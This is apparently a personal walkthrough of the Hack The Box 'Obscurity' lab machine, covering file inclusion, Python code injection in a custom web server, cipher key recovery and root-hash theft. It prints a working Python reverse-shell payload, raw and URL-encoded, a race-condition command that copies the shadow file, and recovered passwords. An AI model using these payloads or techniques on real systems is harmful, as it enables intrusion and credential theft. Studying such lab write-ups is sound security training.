ur - obscurity - 10.10.10.168

From Nmap we can tell there is a ssh server and a http server


![fc6ab8783745e29414b53aa563f11b27.png](../../_resources/215744415dfb46c1b866ba84e77fc962.png)



navigating to the server we see that the company likes to roll their own.
And that the server may be hosed in python, via a SuperSecureServer.py file


![c2e4cd7e861d58024af4d56ba4ff9e7a.png](../../_resources/f30e2a06d2494244a06b65052d684bad.png)


using dirbuster we find some errors poping up


![c24e02651e2df0f140fc5f8210063490.png](:/c6a43f2cc7514887be7a4b905e44a9ec)


when testing i found that ‘ is a bad char but adding another ’ means that it is allowed once more.


![49888f3c47b3fc61e2bc9c10254d95f0.png](../../_resources/eb50f5ea3a294292a3deccc6dc1ba34a.png)



![79f08b2961d686c404bd32f86890e88a.png](../../_resources/abebc05f2be045f0a3805fa08c911f2b.png)



Futher more it appers that i can perform a localfile inclusion


![d3bd012893fae5054342963f5368b147.png](../../_resources/e0ebaf5f1341460284db5881ae4ee9aa.png)



![556ad7495afa274a1f1d5bfe27b4d691.png](../../_resources/e3e1d86662b9448e9d5ef675ed9033c8.png)



However i may not have permission to read os-release.

Going back to the comment i thought could the Secret developmet folder be just one dir up


![66543d86c318f9cb49f5b04b0da361ba.png](../../_resources/3521dc5cfc60451293914763aea19cdf.png)



Looking at the code we can see why the ' can make it crash


![33a0c6f96ba2fe508e358ee96fb0e96f.png](../../_resources/427ef9c6fbd7428fa0e2582be1389555.png)


additionally this shows we may get code execution.
We can therefor get a reverse shell with some python

```
';import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.25",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

which when url encoded creates

```
%27%3Bimport%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.15.25%22%2C1337%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27
```

createing the url 


```
http://obscurity.htb:8080/%27%3Bimport%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.15.25%22%2C1337%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27
```


![554782d0dc37c2dda2d10151c6e43a38.png](../../_resources/b11b062fef4f434a94f9424dec4605f1.png)



in this directory are three files check.txt; out.txt; and passwordreminder.txt, supersecure crypt
we can read all of these, hence we can exfill with the base64 command.



![c8785d3ccbeb298d748df763098dd5c3.png](../../_resources/f5d4af0d064d405fb41469ecb577e783.png)


Reading the check.txt we find a note.


![97bf7a4299e419c886357c95a8ddf487.png](../../_resources/61fdcf082fb442f1a82ec3a20a0ab73d.png)



Also looking at the code the encripted text is the sum of the plain text and the key.
And to deript you subtract the key.




However as we have the encripted text and the plain text we can use the plainetext as the key to decript the key.

![ada4d53d4785ffbcd276e3a3d1eebf9f.png](../../_resources/3dd14f5bf68f4170a4a9b9257e953bb9.png)



![7de61d62134a46131ff7c28fd180e9c0.png](../../_resources/57a2cbe43a924d26bb298cc22e236817.png)




from this we can see the key is  alexandrovichalex
with this we can decript the password reminder


![7bc7dffda6fa3b44e37fe6d172475745.png](../../_resources/565b66cc14734893bd9fad733ca7ab08.png)


the password being SecThruObsFTW
with this we can now ssh as robert.


![b67f638a19c55a170530fe387f783945.png](../../_resources/f1599148dfa249a08fc7cf990024e19e.png)


running sudo -l we can find out what programs we can run as sudo.


![7ea3dca55c9eb6f3c98444c5989aef75.png](../../_resources/9a0066cbf5d94957bdebc59b77521d73.png)


Looking at the code it appers to save the shadow file in to the /tmp/SSH


![fd6dde31dcaaa480f064ceb3f75ed2a4.png](:/e9da4eb8b1814d3eb80eea66e4dfa343)


 i created a watch on the folder and the file when written to a new dir with
 .

```
 watch -n 0.05 cp -r /tmp/SSH /dev/shm/x
```


![ede73f34d27d1f5141743021be6d10b9.png](../../_resources/c6783fd0986140ccb7fe5f89d4ce60c3.png)



![bc347a66a3c382c9d49b92b621d68faa.png](../../_resources/a0c0867de5224000b187b12fcc4f63d9.png)




so i got two copies i only need one and i can exfill with base64


![1e5df83275db535318c082181c59b0cf.png](../../_resources/ebf8fb4391014cf295c81307e13fcb59.png)


Converting next i converted the shadow file by takeing the line with the user root and the line beneith and putting a : between to make a file john the ripper would understand



![08985d32ddee08502df022ece0884c7a.png](../../_resources/9d8e51dce17346bd8e71c35e3d41d16b.png)



![f95f5bd6c247983f605d05460da8b384.png](../../_resources/7ae68651b42f4ea3ac8e030e320cc5f3.png)





![833159c8aea2859da283e55d1239d8b3.png](../../_resources/adfad551d5de4a6d82f0504a23d8f163.png)




